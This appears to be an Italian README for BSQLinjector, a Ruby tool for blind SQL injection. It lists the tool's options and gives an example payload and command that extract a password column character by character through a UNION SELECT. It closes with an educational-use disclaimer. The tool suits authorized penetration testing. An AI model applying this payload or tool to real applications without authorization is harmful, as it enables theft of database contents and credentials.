
Strumento di sfruttamento di blind SQL injection scritto in ruby.
BSQLinjector utilizza il metodo blind per recuperare dati da database SQL. Raccomando di usare lo switch "--test" per vedere chiaramente come appare il payload configurato prima di inviarlo a un'applicazione.
--file Obbligatorio - File contenente una richiesta HTTP valida e il punto di SQL injection (SQLINJECT). (--file=/tmp/req.txt)
--pattern Obbligatorio - Pattern da cercare quando la query è vera. (--pattern=truestatement)
--prepend Obbligatorio - Payload principale. (--prepend="abcd'and'a'='b'+union+select+'truestatement'+from+table+where+col%3d'value'+and+substr(password,"
--append Come terminare il nostro payload. Per esempio commentare il resto della dichiarazione SQL. (--append='#)
--schar Carattere posto intorno ai caratteri. Questo carattere non viene usato in modalità hex. (--schar="'")
--2ndfile File contenente una richiesta HTTP valida usata nello sfruttamento di secondo ordine. (--2ndfile=/tmp/2ndreq.txt)
--mode Modalità blind da usare - (between - b (genera meno richieste), moreless - a (genera meno richieste usando i caratteri "<", ">", "="), like - l (bruteforce completo), equals - e (bruteforce completo)). (--mode=l)
--postgres Usa "for" di postgres nella funzione substring (es. from 1 for 1).
--hex Usa hex per confrontare invece di caratteri.
--case Sensibilità alle maiuscole/minuscole.
--ssl Usa SSL.
--proxy Proxy da usare. (--proxy=127.0.0.1:8080)
--test Abilita modalità test. Non inviare richiesta, mostra solo il payload completo.
--special Includi tutti i caratteri speciali nell'enumerazione.
--start Avvia enumerazione dal carattere specificato. (--start=10)
--max Massimo di caratteri da enumerare. (--max=10)
--timeout Timeout nell'attesa di risposte. (--timeout=20)
--only-final Interrompi la visualizzazione di ogni lettera enumerata.
--comma Codifica la virgola.
--bracket Aggiungi parentesi alla fine della funzione substring. --bracket="))"
--hexspace Usa spazio invece di parentesi per separare valori hex.
--verbose Mostra messaggi dettagliati.
ruby ./BSQLinjector.rb --pattern=truestatement --file=/tmp/req.txt --schar="'" --prepend="abcd'and'a'='b'+union+select+'truestatement'+from+table+where+col%3d'value'+and+substr(password," --append="'#" --ssl
Dichiarazione di non responsabilità
Questo repository contiene uno strumento sviluppato strettamente per scopi educativi. Qualsiasi uso improprio dello strumento per attività illegali è severamente vietato.
Nota legale
È importante comprendere e rispettare tutte le leggi e i regolamenti locali relativi alla cybersecurity e all'hacking etico. L'accesso non autorizzato a sistemi informatici, reti o dati è illegale e punibile per legge. Lo sviluppatore di questo repository non è responsabile per qualsiasi uso improprio degli strumenti in esso contenuti.
Utilizzando gli strumenti in questo repository, accetti di usarli in modo responsabile ed etico. Ottieni sempre autorizzazione esplicita prima di testare o tentare di accedere a qualsiasi rete, sistema o dato che non ti appartiene.